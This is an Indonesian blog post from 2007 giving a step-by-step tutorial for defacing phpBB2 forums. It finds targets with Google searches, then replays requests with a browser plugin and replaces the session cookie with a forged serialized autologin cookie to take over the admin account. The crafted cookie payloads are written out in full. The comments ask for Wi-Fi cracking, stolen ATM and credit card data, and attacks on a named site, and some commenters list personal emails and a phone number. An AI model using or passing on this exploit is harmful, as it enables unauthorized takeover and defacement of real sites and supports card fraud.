Saturday, March 31, 2007

Defacing

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul

18 comments:

hijacker said...

kere...nn tapi kalo versi phpbb nya disembunyikan sama admin web nya,nah itu gimana supaya tau versinya.

thank's

azrirrahman said...

mb sri mau nanya.. ni azriel
di tempat saya ada wifi yang di protect dengan password. dia pake router. gmn caranya bongkar paswordnya?

AxIs Yzr said...

walah sungguh ndak seru kirimin donk mbak no. ma pwd atmnya orang gt mbak
w dah kere nih mbak pakai kartu ndiri
mbak kirim ke saya ajah ya
my_linux77@yahoo.co.id
tq mbk w tunggu
klo udah sms ajaah saya 085645357600
antoni

M Miftahul Ulum said...

waduhhhhh bulet yo......

http://jailkomputer.blogspot.com

Unknown said...

mb... tolong hack kan situs ini www.beritamuslim.wordpress.com demi kemaslahatan umat islam... please

Muchammad faisal said...

lam knal mohon bimbingannya,,,

Fheby Paladang said...

ada cara pencegahannya g..?

Fheby Paladang said...

tolong blas yg cepat y..
perlu banget soalnya..
makasih ^^

Unknown said...

mbag... minta no kartu kreditnya 1 mbag.... buat beli GF nya Mafia Wars... fian_su@yahoo.co.id
thanks...

tututs8 said...

hebat hebat....minta bimbingannya....terutama utk hacking sistem jaringan transaksi....

Raya said...

mbaa.. tolong ajarin saya nge hackk..

ini fb saya : achmad reza haryana

Kediri Comunity™ HACKERS said...

wew....Rumit nya.....

itzadv said...

mbak tolong ajarin saya dong....plizz

ke itz.armi@gmail.com ya......

itzadv said...

hello, there....
kamu bisa dapet data card org plus nomer ccv-nya? boleh minta tolong ga? kasih tau dan ajarin caranya dong buat dapet data itu dan darimana, please need help banget nih...terpaksa sih, cm yah gmn lagi....
d tunggu yah balesannya...thx

Unknown said...

hmmm.....

Unknown said...

saya udah pake firefox trz pake liveHTTPheaders,,
trz gimana caranya dpet phpBB nya mba'????

gapriadi said...

Benner g'nekh???

wotu champ said...

salut gue ma lhoe.....

vi... kok saya gak bisa download yah aplikasi yang kaka' maksud tadi....???